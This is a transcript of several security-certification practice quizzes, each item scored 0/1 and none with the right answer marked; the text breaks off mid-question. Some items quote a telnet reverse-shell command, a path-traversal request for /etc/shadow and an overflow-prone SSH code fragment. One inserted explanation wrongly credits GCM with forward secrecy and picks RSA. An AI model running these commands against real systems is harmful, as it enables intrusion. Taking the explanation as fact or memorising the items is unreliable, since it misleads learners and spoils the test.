Full Transcript

Points: 0/1 1. A security analyst has been tasked with assessing a new API. The analyst needs to be able to test for a variety of different inputs, both malicious and benign, in order to close any vulnerabilities. Which of the following should the analyst use to achieve this goal? A. Fuzz tes...

Points: 0/1 1. A security analyst has been tasked with assessing a new API. The analyst needs to be able to test for a variety of different inputs, both malicious and benign, in order to close any vulnerabilities. Which of the following should the analyst use to achieve this goal? A. Fuzz testing B. Static analysis C. Input validation D. Post-exploitation Points: 0/1 2. In order to authenticate employees who call in remotely, a company’s help desk staff must be able to view partial information about employees because the full information may be considered sensitive. Which of the following solutions should be implemented to authenticate employees? A. Metadata B. Encryption in transit C. Data scrubbing D. Field masking Points: 0/1 3. The IT team suggests that the company would save money by using self-signed certificates, but the security team indicates the company must use digitally signed 3rd party certificates. Which of the following is a valid reason to pursue the security team's recommendation? A. There is minimal benefit using a CRL B. There is more control is using a local certificate over a 3rd party certificate C. PKCS#10 is still preferred over PKCS#12 D. Private-key CSR signage prevents on-path interception Points: 0/1 4. A SaaS startup is maturing its DevSecOps program and needs to identify weaknesses earlier in the development process in order to reduce the average time to identify serverless application vulnerabilities and the costs associated with the remediation. The startup began its early testing efforts with DAST to cover public facing application components and recently implemented a bug bounty program. Which of the following will best accomplish the company's objectives? A. CMS B. WAF C. SAST D. RASP https://www.synopsys.com/blogs/software-security/sast-iast-dast-rasp-differences.html Points: 0/1 5. Company A acquired Company B. During an initial assessment, the companies discover they are using the same SSO system. To help users with the transition, Company A is requiring the following: Before the merger is complete, users from both companies should be using a single set of usernames and passwords Users in the same departments should have the same set of rights and permissions, but they should have different sets of rights and permissions if they have different IPs Users from Company B should be able to access Company A’s available resources Which of the following are the best solutions? (Select TWO) A. Updating login scripts B. Implementing attribute-based access control C. Installing COmpany As Kerberos systems in Company Bs network D. Enabling MFA E. Establishing one-way trust from Company B to Company A F. Installing new GPO policies Points: 0/1 6. A security architect is tasked with securing a new cloud videoconferencing and collab platform to support a new distributed workforce. The security architects key objectives are: Maintain customer trust Ensure non-repudiation Minimize data leakage Of the following, which would be the best set of recommendations from the security architect? A. Enable watermarking, enable user auth requirement, disable video recording B. Enable end to end encryption, disable video recording, disable file exchange C. Enable the user auth requirement, enable end to end encryption, enable waiting rooms D. Disable file exchange, enable watermarking, enable user auth requirement Points: 0/1 7. A security admin needs to implement a security solution that will: Improve performance with less congestion on network traffic Limit attack surface in case of an incident Improve access control for external and internal network security Which of the following should the security admin do? A. Integrate threat feeds into the FIM B. Configure the SIEM dashboards to provide alerts and visualization C. Deploy DLP rules based on updated PII formatting D. Update FW rules to match any new IP addresses in use Points: 0/1 8. A security team created tickets to track the progress of remediations. Which of the following will specify the due dates for high- and critical-priority findings? A. MOU B. MSA C. SLA D. ISA Points: 0/1 9. An organization's existing infrastructure includes site to site VPNs between data centers. Over the past year, a sophisticated attacker exploited a zero day on the VPN concentrator. In response, the CISO is making infrastructure changes to mitigate the risk of service loss should another zero day exploit be used against the VPN solution. Which of the following designs would be best for the CISO to use? A. Using Base64 encoding within the existing site to site VPN connections B. Implementing IDS services with each VPN concentrator C. Transitioning to a container-based architecture for site based services D. Adding a 2nd redundant layer of alternate vendor VPN concentrators E. Distributing security resources across VPN sites Points: 0/1 10. When implementing serverless computing, an organization must still account for: A. the underlying computing network infrastructure B. hardware compatibility C. the security of its data D. patching the service Points: 0/1 11. The CEO of an online retailer notices a sudden drop in their sales. A security analyst at the retailer detects a redirection of unsecure web traffic to a competitor’s site. Which of the following would best prevent this type of attack? A. Configuring certificate pinning B. Enforcing DNSSEC C. Deploying certificate stapling D. Enabling HSTS Points: 0/1 12. Which of the following will provide the best solution for organizations that want to securely back up the MFA seeds for its employees in a central, offline location with minimal management overhead? A. HSM B. Encrypted database C. Key escrow service D. Secrets management Points: 0/1 13. A security engineer is accessing a legacy server and needs to determine if the FTP is running and on which port. The service can not be turned off, as it would impact critical applications' ability to function. Which command will provide the info necessary to create a FW rule to prevent that service from being exploited? A. netstat -tulpn B. service ftpd status C. service --status-all | grep ftpd D. chkconfig --list E. systemctl list-unit-file --type service ftpd -t : Display TCP connections. - u : Display UDP connections. -l : Display listening socket (services). -p : Display the process associated with the service. -n : Display numerical addresses instead of resolving hostnames. Points: 0/1 14. A SOC analyst gets an alert about a potential compromise and reviews the following SIEM logs: 1:15:02PM JMyers successful login on laptop 318 1:15:45PM JMyers launched outlook.exe on laptop318 1:17:03PM Process outlook.exe launch cmd.exe on laptop318 1:17:04PM Process cmd.exe launched rdp.exe on laptop318 1:17:04PM Process cmd.exe launched rdp.exe on laptop318 1:17:05PM JMyers successful login on server112 1:17:05PM JMyers successful login on server113 1:17:07PM JMyers launched cmd.exe on server112 1:17:07PM JMyers launched cmd.exe on server113 Which of the following is the most appropriate action for the analyst to recommend? A. Alerting JMyers about the potential account compromise B. Isolating laptop318 from the network C. Creating NIPS and HIPS rules to prevent logins D. Disabling account JMyers to prevent further lateral movement Points: 0/1 15. What is record level encryption commonly used to do? A. Encrypt individual packets B. Protect individual files C. Encrypt the master boot record D. Protect database fields Points: 0/1 16. A security architect for a large, multinational manufacturer needs to design and implement a security solution to monitor traffic. When designing the solution, which of the following threats should the security architect focus on to prevent attacks against the OT network? A. Multiple solicited responses over time B. The application of an unsupported encryption algorithm C. Packets that are the wrong size or length D. The use of any non-DNP3 communication on a DNP3 port Points: 0/1 17. A security engineer is creating a single CSR for the following web hostnames: www.int.internal www.company.com home.internal www.internal Which would meet the requirement? A. CN B. CA C. Issuer D. SAN E. CRL Points: 0/1 18. The principal security analyst for a global manufacturer is investigating a security incident related to abnormal behavior in the UCS network. A controller was restarted as part of the troubleshooting process, and the following issues were identified when the controller was restarted: SECURE BOOT FAILED: FIRMWARE MISMATCH EXPECTED 0xFDC479 ACTUAL 0x79F31B During the investigation, this modified firmware version was identified on several other controllers at the site. The official vendor firmware versions do not have this checksum. Which of the following stages of the MITRE ATT&CK framework for ICS includes this technique? A. Persistence B. Evasion C. Lateral movement D. Collection Points: 0/1 19. Which of the following is a risk associated with SDN? A. Expanded attack surface B. Increased hardware management costs C. Reduced visibility of scaling capabilities D. New firmware vulnerabilities Points: 0/1 20. A forensics investigator is analyzing an executable file extracted from storage media that was submitted for evidence. The investigator must use a tool that can identify whether the executable has indicators, which may point to the creator of the file. Which of the following should the investigator use while preserving evidence integrity? A. ldd B. bcrypt C. ssdeep D. dcfldd E. SHA-3 Points: 0/1 21. A security architect is implementing a SOAR solution in an organization’s cloud production environment to support detection capabilities. Which of the following will be the most likely benefit? A. Increased risk availability B. Optimized cloud resource utilization C. Improved security operations center performance D. Automated FW log collection tasks Points: 0/1 22. A systems engineer needs to develop a solution that uses digital certificates to allow authentication to laptops. Which of the following authenticator types would be most appropriate for the engineer to include in the design? A. TOTP token B. Device certificate C. Biometric D. Smart card Points: 0/1 23. An organization’s board of directors has asked the CISO to build a 3rd party management program. Which of the following best explains a reason for this request? A. Risk management B. Risk transference C. Supply chain visibility D. Support availability Points: 0/1 24. An organization has an operational management with a specific equipment vendor. The organization is located in the US, but the vendor is located in another region. Which of the following risks would be most concerning to the organization in the event of equipment failure? A. Support may not be available during all business hours B. Each region has different regulatory frameworks to follow C. The organization requires authorized vendor specialists D. Shipping delays could cost the organization money Points: 0/1 25. The general counsel at an organization has received written notice of upcoming litigation. The general counsel has issued a legal record hold. Which of the following actions should the organization take to comply with the request? A. Request that all users do not delete any files B. Require employees to be trained on legal record holds C. Block communication with the customer while litigation is ongoing D. Preserve all communications matching the requested search terms Close Retake Quiz Points: 0/1 1. A security engineer is concerned about the threat of side-channel attacks. The company experienced a past attack that degraded parts of a SCADA system, causing a fluctuation to 20,000 rpms from its normal operating range. This caused the part to deteriorate more quickly than the mean time to failure. A further investigation revealed the attacker was able to determine the acceptable rpm range, and the malware would then fluctuate the rpm until the part failed. Which of the following solutions would be best to prevent a side-channel attack in the future? A. Implementing a HIDS b. Installing online hardware sensors c. Air gapping important ICS and machines d. Installing a SIEM agent on the endpoint Points: 0/1 2. Which of the following is the most important cloud specific risk from the CSPs viewpoint? A. CI/CD deployment failure B. Management plane breach C. Insecure data deletion D. Resource exhaustion Points: 0/1 3. A mobile admin is reviewing the following mobile device DHCP logs to ensure the proper mobile settings are applied to managed devices: 10, 10/18/2021, 17:01:05, Assign, 192.168.1.10, UserA-MobileDevice, 0236FB12CA0B 23, 10/19/2021, 07:11:19, Assign, 192.168.1.23, UserA-MobileDevice, 068ADIFAB109 10, 10/20/2021, 19:22:56, Assign, 192.168.1.96, UserA-MobileDevice, 0ABC65E81AB0 10, 10/21/2021, 22:34:15, Assign, 192.168.1.33, UserA-MobileDevice, BAC034EF9451 10, 10/22/2021, 11:55:41, Assign, 192.168.1.12, UserA-MobileDevice, 0E938663221B Which of the following mobile configuration settings is the mobile admin verifying? A. Wireless network auto joining B. 802.1X with mutual authentication C. Service set identifier authentication D. Association MAC address randomization Points: 0/1 4. Which of the following technologies would benefit the most from the use of biometric readers, proximity badge entry systems, and the use of hardware security tokens to access various environments and data entry systems? A. Machine learning B. Deep learning C. Nanotechnology D. Biometric impersonation E. Passwordless authentication Points: 0/1 5. A security manager has written an incident response playbook for insider attacks and is ready to begin testing it. Which of the following should the manager conduct to test the playbook? A. Centralized logging, data analytics, and visualization B. Threat emulation C. Threat hunting D. Automated vulnerability scanning Points: 0/1 6. A security admin wants to detect a potential forged sender claim in the envelope of an email. Which of the following should the security admin implement? (select TWO) A. TLS B. SPF C. DMARC D. MX record E. S/MIME F. DNSSEC Points: 0/1 7. A pentester inputs the following command: telnet 192.168.99.254 343 \ /bin/bash \ telnet 192.168.99.254 344 This command will allow the pentester to establish a: A. network pivot B. proxy chain C. reverse shell D. port mirror Points: 0/1 8. A government agency's cyber analyst is concerned about how PII is protected. A supervisor indicates that Privacy Impact Assessment must be done. Which of the following describes a function of a Privacy Impact Assessment? A. To document residual risks B. To identify the network ports C. To evaluate threat acceptance D. To validate the project participants Points: 0/1 9. An IoT device implements an encryption module within its SoC, where the asymmetric private key has been defined in a write-once read-many portion of the SoC hardware. Which of the following should the IoT manufacturer do if the private key is compromised? A. Replace the public portion of the IoT key on its servers B. Release a patch for the SoC software C. Manufacture a new IoT device with a redesigned SoC D. Use over the air updates to replace the private key Points: 0/1 10. A small bank is evaluating different methods to address and resolve the following requirements: Must maintain confidentiality if one piece of the layer is compromised Must be able to store credit card data using the smallest amount of data possible Must be compliant with PCI-DSS Which of the following is the best solution for the bank? A. Masking B. Scrubbing C. Tokenization D. Homomorphic encryption Points: 0/1 11. A network admin managing a Linux web server notices the following traffic: http://comptia.org/../../../../etc/shadow Which of the following is the best action for the network admin to take to defend against his type of attack? A. Validate that MFA is enabled on the server for all user accounts B. Validate that the server is not deployed with default account credentials C. Validate the server certificate and trust chain D. Validate the server input and append the input to the base directory path Points: 0/1 12. A security engineer needs to select the architecture for a cloud database that will protect an organization’s sensitive data. The engineer has a choice between a single tenant or a multitenant database architecture offered by a cloud vendor. Which of the following best describes the security benefit org the single-tenant option? (Select TWO) A. Increased geographic diversity B. Full control and ability to customize C. High degree of privacy D. Most cost-effective E. Low resilience to side-channel attacks F. Ease of backup and restoration Points: 0/1 13. An employee’s device was missing for 96 hours before being reported. The employee called the help desk for another device. Which of the following phases of the incident response cycle needs improvement? A. Resolution B. Investigation C. Containment D. Preparation Points: 0/1 14. An internal security audit determines that Telnet is currently being used within the environment to manage network switches. Which of the following tools should be utilized to identify credentials in plaintext that are used to log in to these devices? A. Fuzzer B. HTTP interceptor C. Port scanner D. Password cracker E. Network traffic analyzer Points: 0/1 15. A company is acquiring a competitor, and the board has asked the CIO to perform due diligence activities on the competitor prior to acquisition. A recent compliance audit of the competitor environment shows no critical findings and exemplary policy and processes. Since the competitor has an audited environment, the CIOs recommendation to the board is to move forward with existing security capabilities and write additional security controls to manage the additional risks. Which of the following risk management strategies is the CIO recommending? A. Mitigate and accept B. Reduce and mitigate C. Transfer and accept D. Mitigate and transfer Points: 0/1 16. After connecting to a company’s newly built production website (https://www.company.com) using a browser, a systems admin reviewed the following output: /var/www/html/index.html /var/www/html/image01.png /var/www/html/server.crt /var/www/html/server.gif /var/www/html/server.key /var/www/html/test.cgi /var/www/html/test-form.php /var/www/html/user-db-connect.php /var/www/html/user-auth.php Which of the following should the admin do next? (Select TWO) A. Implement a WAF in front of the web server B. Disable the directory listing C. Configure the server to load index.html by default D. Scan PHP and CGI files for secure coding E. Update user-db-connect.php with the appropriate credentials F. Request an update to the CRL Points: 0/1 17. An organization needs to classify its systems and data in accordance with external requirements. Which of the following roles is best qualified to perform this task? A. Data owner B. Data processor C. Data custodian D. Systems admin E. Data steward Points: 0/1 18. In a situation where the cost of anti-malware exceeds the potential loss from a malware threat, which of the following is the most cost-effective risk response? A. Risk transfer B. Risk mitigation C. Risk acceptance D. Risk avoidance Points: 0/1 19. After the latest risk assessment, the CISO decides to meet with the development and security teams to find a way to reduce the security task workload. The CISO would like to: Have a solution that uses API to communicate with other security tools Use the latest technology possible Have the highest controls possible on the solution Which of the following is the best option to meet these requirements? A. CSP B. CASB C. SOAR D. EDR Points: 0/1 20. An organization is in frequent litigation and has a large number of legal holds. Which of the following types of functionality should the organization’s new email system provide? A. DLP B. Encryption C. E-discovery D. Privacy-level agreements Points: 0/1 21. An organization recently completed a security controls assessment. The results highlighted the following vulnerabilities: Out of date definitions Misconfigured operating systems An inability to detect active attacks Unimpeded access to critical servers USB ports Which of the following will most likely reduce the risks that were identified by the assessment team? A. Implemented a vulnerability management program and a SIEM tool with alerting, install a badge system with zones, restrict privileged access B. Install EDR on endpoints, configure group policy, lock server room doors, install a camera system with guards watching 24/7 C. Create an information security program that addresses user training, perform weekly audits of user workstations, utilize a centralized configuration management program D. Update antivirus definitions, install NGFW with logging enabled, use USB port lockers, run SCAP scans weekly Points: 0/1 22. A company has retained the services of a consultant to perform a security assessment. As part of the assessment, the consultant recommends engaging with others in the industry to collaborate in regards to emerging attacks. Which of the following would best enable this activity? A. ISAC B. OSINT C. CVSS D. Threat modeling Points: 0/1 23. The CISO asked a security manager to set up a system that sends an alert whenever a mobile device enters a sensitive area of the company’s data center. The CISO would also like to be able to alert the individual who is entering the area that the access was logged and monitored. Which of the following would meet these requirements? A. Bluetooth B. Geofencing C. NFC D. SMS Points: 0/1 24. A security officer is requiring all personnel working on a special project to obtain a security clearance requisite with the level of all information being accessed. Data on this network must be protected at the same level of each clearance holder. The need to know must be verified by the data owner. Which of the following should the security officer do to meet these requirements? A. Create a rule to authorize personnel only from certain IPs to access the files B. Assign labels to the files and require formal access authorization C. Assign attributes to each file and allow authorized users to share the files D. Assign roles to users and authorize access to files based on the roles Points: 0/1 25. A company recently deployed a SIEM and began importing logs from a fw, file server, domain controller, web server, and a laptop. A security analyst receives a series of SIEM alerts and prepares to respond. The following is the alert information: Severity Source Device Event Info Time (UTC) Medium abc-usa-fw01 RDP (3389) traffic from 1020:08 abc-admin-lp01 to abc-usa-fs1 Low abc-ger-dc1 Successful logon event for user 1020:34 rsmith on abc-usa-fs1 Medium abc-ger-fw01 RDP (3389) traffic from 1021:02 abc-usa-fs1 to abc-ger-fs1 Low abc-usa-fw01 SMB (445) traffic from 1020:21 abc-usa-fs1 to abc-web01 Low abc-usa-dc1 Successful logon event for user 1024:55 rsmith on abc-ger-fs1 High abc-usa-fw01 FTP (21) traffic from 1025:16 abc-ger-fs01 to abc-web01 High abc-web01 Successful logon event 1126:40 for user Administrator Which of the following should the security analyst do first? A. Shutdown abc-usa-fw01; the remote access VPN vulnerability is exploited B. Disable rsmith account; it is likely compromised C. Shutdown the abc-usa-fs1 server; a plaintext credential is being used D. Disable Administrator on abc-usa-fs1; the local account is compromised Close Retake Quiz Points: 0/1 1. To save time, a company that is developing a new VPN solution has decided to use the OpenSSL library within its proprietary software. Which of the following should the company consider to maximize risk reduction from vulnerabilities introduced by OpenSSL? A. Compile 3rd party libraries into the main code statically instead of using dynamic loading B. Include stable, long term releases of 3rd party libraries instead of using newer versions C. Ensure the 3rd party library implements the TLS and disable weak ciphers D. Implement an ongoing, 3rd party software and library review and regression testing Points: 0/1 2. A security team performed an external attack surface analysis and discovered the following issues on a group of application servers: The majority of the systems have end of life operating systems The latest patches that are available are over two years old The systems are considered mission critical for client support The proprietary software running on the systems is not compatible with newer versions of the operating system Server outages would negatively affect quarterly revenue projections Which of the following would allow the security team to immediately mitigate the risks inherent to this situation? A. Isolate the servers from the internet and configure an internal ACL, only allowing to authorized employees B. Document the application servers as being end of life and define a target date for decommission C. Contact the vendor for the proprietary software and negotiate a new maintenance contract D. Implement a WAF between the application servers and the external perimeter Points: 0/1 3. A security analyst is performing a vulnerability assessment on behalf of a client. The analyst must define what constitutes a risk to the organization. Which of the following should be the analyst’s first action? A. Determine which security compliance standards should be followed B. Perform a full system penetration test to determine the vulnerabilities C. Ascertain the impact of an attack on the availability of crucial resources D. Create a full inventory of information and data assets Points: 0/1 4. Company A acquired Company B. During an audit, a security engineer found Company B's environment was inadequately patched. In response, Company A placed a fw between the two environments until Company B's infrastructure could be integrated into Company A's security program. Which of the following risk handling techniques was used? A. Avoid B. Accept C. Transfer D. Mitigate Points: 0/1 5. A company wants to refactor a monolithic application to take advantage of cloud native services and service microsegmentation to secure sensitive application components. Which of the following should the company implement to ensure the architecture is portable? A. Virtualized emulators B. Orchestration C. Type2 hypervisor D. Containerization Points: 0/1 6. A hospital has fallen behind with patching known vulnerabilities due to concerns that patches may cause disruptions in the availability of data and impact patient care. The hospital does not have a tracking solution in place to audit whether systems have been updated or to track the length of time between notification of the weakness and patch completion. Since tracking is not in place, the hospital lacks accountability with regard to who is responsible for these activities and the timeline of patching efforts. Which of the following should the hospital do first to mitigate this risk? A. Ensure CVEs are current B. Complete a vulnerability analysis C. Purchase a ticketing system for auditing efforts D. Obtain guidance from the health ISAC E. Train admins on why patching is important Points: 0/1 7. Some end users of an e-commerce website are reporting a delay when browsing pages. The website uses TLS 1.2. A security architect for the website troubleshoots by connecting from home to the website and capturing traffic via Wireshark. The security architect finds that the issue is the time required to validate the certificate. Which of the following solutions should the security architect recommend? A. Adding more nodes to the web server clusters B. Changing the cipher algorithm used on the web server C. Implementing OCSP stapling on the server D. Upgrading to TLS 1.3 Points: 0/1 8. A CSO is concerned about the number of successful ransomware attacks that have hit the company. The data indicates most of the attacks came through a fake email. The company has added training, and the CSO now wants to evaluate whether the training has been successful. Which of the following should the CSO implement? A. Performing a risk assessment B. Conducting a sanctioned vishing attack C. Simulating a spam campaign D. Executing a pen test Points: 0/1 9. As part of a policy and procedure review, a data privacy officer is working with system owners to identify appropriate assignments for personnel to perform access management activities based on the input provided by system owners. Which of the following describes the personnel who will receive input from system owners? A. Data subjects B. Authoritative sources C. Systems admins D. Regulators E. Custodians Points: 0/1 10. During a network defense engagement, a red team is able to edit the following registry key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Which of the following tools is the red team using to perform this action? A. Fuzzer B. Network vulnerability scanner C. SCAP scanner D. PowerShell Points: 0/1 11. A DevOps engineer submits a VM for hardening verification as part of a new IaaS deployment. The DevOps engineer attests that: The device has all production software installed All services are running on their default ports All security policies have been applied through GPOs All unnecessary software has been removed The submitting engineer provided the following information: Server type MS SQL Management interface RDP Windows file sharing required Yes A compliance engineer performs an unauthenticated network vulnerability scan as part of hardening verification. The vulnerability scanner has fw access to the device, and its source IP has been added to the allow list in the devices endpoint protection software. No known vulnerabilities have been identified. The scan identified the following ports: Port Status 445 Open 22 Open 3389 Open 135 Open 139 Open Company policy states that a system that has no known vulnerabilities and has been confirmed to have all production software installed will meet hardening requirements and will be approved for production. Which of the following actions should the compliance engineer take, based on the server configuration and the results of the vulnerability scan? (Select THREE) A. Reject the server B. Have the user verify that MS SQL is installed properly C. Recommend uninstalling PostgreSQL D. Recommend closing the service on port 22 E. Approve the server F. Recommend closing the service on port 3389 G. Recommend removing Flash Player H. Recommend closing the service on port 445 Points: 0/1 12. A developer wants to maintain integrity to each module of a program and ensure controls are in place to detect unauthorized code modification. Which of the following would be best for the developer to perform? (Select TWO) A. Verify MD5 hashes B. Encrypt with 3DES C. Utilize code signing by a trusted 3rd party D. Compress the program with a password E. Implement certificate based authentication F. Make the DACL read-only Points: 0/1 13. A forensic investigator started the process of gathering evidence on a laptop in response to an incident. The investigator took a snapshot of the hard drive, copied relevant log files, and then performed a memory dump. Which of the following steps in the process should have occurred first? A. Clone the disk B. Collect the most volatile C. Copy the relevant log files D. Preserve secure storage Points: 0/1 14. A company is looking to fortify its cybersecurity defenses and is focusing on its network infrastructure. The solution cannot affect the availability of the company’s services to ensure false positives do not drop legitimate traffic. Which of the following would satisfy the requirement? A. NIDS B. NIPS C. WAF D. Reverse proxy Points: 0/1 15. A multinational organization was hacked, and the IRTs timely action prevented a major disaster. Following the event, the team created an after action report. Which of the following is the primary goal of an after action review? A. To identify ways to improve the response process B. To create a plan of action and milestones C. To determine the identity of the attacker D. To gather evidence for subsequent legal action Points: 0/1 16. A local university that has a global footprint is undertaking a complete overhaul of its website and associated systems. Some of the requirements are: Handle an increase in customer demand of resources Provide quick and easy access to information Provide high quality streaming media Create a user friendly interface Which of the following actions should be taken first? A. Deploy high availability web servers B. Enhance network access controls C. Implement a content delivery network D. Migrate to a virtualized environment Points: 0/1 17. A security architect is analyzing an old application that is not covered for maintenance anymore because the software compamy is no longer in business. Which of the following techniques should have been implemented to prevent these types of risks? A. Source code escrows B. Software audits C. Code review D. Supply chain visibility Points: 0/1 18. A common industrial protocol has the following characteristics: Provides for no authentication/security Is often implemented in a client/server relationship Is implementing as either RTU or TCP/IP Which of the following is being described? A. Profinet B. Zigbee C. Modbus D. Z-wave Points: 0/1 19. A security consultant has been asked to identify a simple, secure solution for a small business with a single access point. The solution should have a single SSID and no guest access. The customer facility is located in a crowded area of town, so there is a high likelihood that several people will come into range every day. The customer has asked that the solution require low administrative overhead and be resistant to offline password attacks. Which of the following should the security consultant recommend? A. WPA2-PSK B. WPA2-Enterprise C. WPA3-Personal D. WPA3-Enterprise Points: 0/1 20. An organization established an agreement with a partner company for specialized help desk services. A senior security officer within the organization is tasked with providing documentation required to set up a dedicated VPN between the two entities. Which of the following should be required? A. MOU B. SLA C. NDA D. ISA Close Retake Quiz Review Answers Points: 0/1 1. An organization is in frequent litigation and has a large number of legal holds. Which of the following types of functionality should the organization's new email system provide? A. DLP B. Encryption C. E-discovery D. Privacy-level-agreements Points: 0/1 2. Which of the following should be established when configuring a mobile device to protect user internet privacy, to ensure the connection is encrypted, and keep user activity hidden? (Select TWO) A. RDP B. MDM C. Tunneling D. VDI E. Proxy F. MAC randomization Points: 0/1 3. An organization is assessing the security posture of a new SaaS CRM system that handles sensitive PII and identity information, such as passport numbers. The SaaS CRM system does not meet the organization’s current security standards. Post remediation work, the assessment recorded the following: The will be a $20k per day revenue loss for each day the system is delayed going into production The inherent risk was high The residual risk is low The solution rollout to the contact center will be a staged deployment Which of the following risk handling techniques will best meet the organization’s requirements post remediation? A. Transfer the risk to the SaaS CRM vendor, as the organization is using a cloud service B. Accept the risk, as compensating controls have been implemented to manage the risk C. Apply for a security excemption, as the risk is too high to accept D. Avoid the risk by accepting the shared responsibility model with the SaaS CRM provider Points: 0/1 4. In a shared responsibility model for PaaS, which of the following is the customer's responsibility? A. OS security B. Physical security C. Host infrastructure D. Network security Points: 0/1 5. An analyst has prepared several possible solutions to a successful attack on the company. The solutions need to be implemented with the least amount of downtime. Which of the following should the analyst perform? A. Implement all the solutions at once in a virtual lab and then run the attack simulation. Collect the metrics and then choose the best solution based on the metrics. B. Implement all the solutions at once in a virtual lab and the collect the metrics. After collection, run the attack simulation. Choose the best solution based on the metrics. C. Implement every solution one at a time in a virtual lab, running metric collection each time. After the collection, run the attack simulation, roll back each solution, and then implement the next. Choose the best solution based on the metrics. D. Implement every solution one at a time in a virtual lab, running an attack simulation each time while collecting metrics. Roll back each solution and then implement the next. Choose the best solution based on the metrics. Points: 0/1 6. A 3rd party organization has implemented a system that allows it to analyze customers' data and deliver analysis results without being able to see the raw data. Which of the following is the org implementing? A. Data Lake B. Machine learning C. Asynchronous keys D. Homomorphic encryption Points: 0/1 7. A security engineer is implementing a server-side TLS configuration that provides forward secrecy and authenticated encyption with associated data. Which of the following algorithms, when combined into a cipher suite, will meet the requirements? (Select THREE) A. RC4 B. ECDSA C. GCM D. DH E. RSA F. EDE G. CBC H. AES To achieve forward secrecy and authenticated encryption with associated data (AEAD), you should use modern and secure cipher suites. Here are three algorithms that, when combined into a cipher suite, meet these requirements: GCM (Galois/Counter Mode): GCM provides both authenticated encryption and the ability to achieve forward secrecy when used with appropriate key exchange mechanisms like ECDHE or DHE. AES (Advanced Encryption Standard): AES is a symmetric encryption algorithm commonly used with AEAD cipher suites. RSA (Rivest–Shamir–Adleman): While RSA is not typically used for forward secrecy, it can be used for authentication in conjunction with other algorithms that provide forward secrecy. Points: 0/1 8. A university issues badges through a homegrown identity management system to all staff and students. Each week during the summer, temporary summer school students arrive and need to be issued a badge to access minimal campus resources. The security team received a report from an outside auditor indicating the homegrown system is not consistent with the best practices in the security field. Which of the following should the security team recommend first? A. Working with procurement and creating a requirements document to select a new IAM system/vendor B. Updating the identity management system to use discretionary access control C. Investigating a potential threat identified in logs related to the identity management system D. Beginning research on 2f authentication to later introduce into the identity management system Points: 0/1 9. Which of the following processes involves searching and collecting evidence during an investigation or lawsuit? A. Ediscovery B. Review analytics C. Chain of custody D. Information governance Points: 0/1 10. A security analyst has been tasked with providing key information in the risk register. Which of the following outputs or reults would be used to best provide the information needed to determine the security posture for a risk decision? (Select TWO) A. Network traffic analyzer B. Password cracker C. Protocol analyzer D. Vulnerability scanner E. SCAP scanner F. Port scanner Points: 0/1 11. An organization is looking to establish more robust security measures by implementing PKI. Which of the following should the security analyst implement when considering mutual authentication? A. Public keys on both endpoints B. Shared secret for both endpoints C. Perfect forward secrecy on both endpoints D. A common public key on each endpoint E. A common private key on each endpoint Points: 0/1 12. A small data center experienced a ransomware attack, and 10TB of data was encrypted. The data is now unavailable. The attacker was able to convince a guard at the data center entrance that the necessary access card was previously left inside the building. The guard allowed the individual to enter the building, and the attacker was abe to leave an infected pen drive. The CISO is now considering controls to prevent such events from reoccurring in the future. Which of the following describes this phase in the CISO’s response process? A. Recovery B. Identification C. Analysis D. Detection Points: 0/1 13. A security architect is analyzing an old application that is not covered for maintenance anymore because the software company is no longer in business. Which of the following techniques should have been implemented to prevent these types of risks? A. Supply chain visibility B. Source code escrows C. Software audits D. Code review Points: 0/1 14. A company hosts a large amount of data in blob storage for its customers. The company recently had a number of issues with data being prematurely deleted before the scheduled backup processes could be completed. The management team has asked the security architect for a recommendation that allows blobs to be deleted occasionally, but only after a successful backup. Which of the following solutions will best meet this requirement? A. Enable fast recovery on the storage account B. Make the blob immutable C. Implement soft delete for the blobs D. Mirror the blobs at a local data center E. Blob soft delete protects an individual blob, snapshot, or version from accidental deletes or overwrites by maintaining the deleted data in the system for a specified period of time. During the retention period, you can restore a soft-deleted object to its state at the time it was deleted. After the retention period has expired, the object is permanently deleted. https://learn.microsoft.com/en-us/azure/storage/blobs/soft-delete-blob-overview Points: 0/1 15. A new mandate by the corporate security team requires that all endpoints must meet a security baseline before accessing the corporate network. All server and desktop computers are scanned by the dedicated internal scanner appliance installed in each subnet. However, remote worker laptops do not access the network regularly. Which of the following is the best option for the security team to ensure worker laptops are scanned before being granted access to the corporate network? A. Implement network access control to perform host validation of installed patches B. Create a vulnerability scanning subnet for remote workers to connect to on the network at HQ C. Install a vulnerability scanning agent on each remote laptop to submit scan data D. Create an 802.1X implementation with certificate-based device identification Points: 0/1 16. When managing and mitigating SaaS cloud vendor risk, which of the following responsibilities belong to the client? A. Data B. Physical security C. Network D. Storage Points: 0/1 17. A cloud engineer is tasked with improving the responsiveness and security of a company's cloud-based web application. The company is concerned that international users will experience increased latency. Which of the following is the best technoogy to mitigate this concern? A. Containerization B. Caching C. Clustering D. Content delivery network Points: 0/1 18. Which of the following is the most important security objective when applying cryptography to control messages that tell an ICS how much electrical power to output? A. Assuring the integrity of messages B. Improving the availability of messages C. Enforcing protocol conformance for messages D. Ensuring non-repudiation of messages Points: 0/1 19. A developer wants to maintain integrity to each module of a program and ensure controls are in place to detect unauthorized code modification. Which of the following would be best for the developer to perform? (Select TWO) A. Utilize code signing by a trusted 3rd party B. Compress the program with a password C. Encypt with 3DES D. Verify MD5 hashes E. Make the DACL read-only F. Implement certificate-based authentication Points: 0/1 20. A software assurance analyst reviews an SSH daemon's source code and sees the following: nresp = packet_get_int(); if (nresp > 0) { response = xmalloc(nresp*sizeof(char*) ): for (i = 0; i < nresp; i++) Response[i] = packet_get_string(NULL); } Based on this code snippet, which of the following attacks is most likely to succeed? A. Race condition B. Integer overflow C. Driver shimming D. Cross-site scripting Points: 0/1 21. A security analyst has concerns about malware on an endpoint. The malware is unable to detonate by modifying the kernel response to various system calls. As a test, the analyst modifies a Windows server to respond to system calls as if it was a Linux server. In another test, the analyst modifies the OS to prevent the malware from identifying target files. Which of the following techniques is the analyst most likely using? A. Honeypot B. Deception C. Simulators D. Sandboxing Points: 0/1 22. A shipping company that is trying to eliminate entire classes of threats is developing an SELinux policy to ensure its custom Android devices are used exclusively for package tracking. After compiling and implementing the policy, in which of the following modes must the company ensure the devices are configured to run? A. Enforcing B. Protecting C. Permissive D. Mandatory Points: 0/1 23. A company is deploying multiple VPNs to support supplier connections into its extranet applications. The network security standard requires: All remote devices to have up-to-date antivirus A HIDS An up-to-date and patched OS Which of the following technologies should the company deploy to meet its security objectives? (Select TWO) A. NAC B. Reverse proxy C. NIDS D. WAF E. NGFW F. Bastion host Points: 0/1 24. Which of the following communications protocols is used to create PANs with small, low power radios and supports a 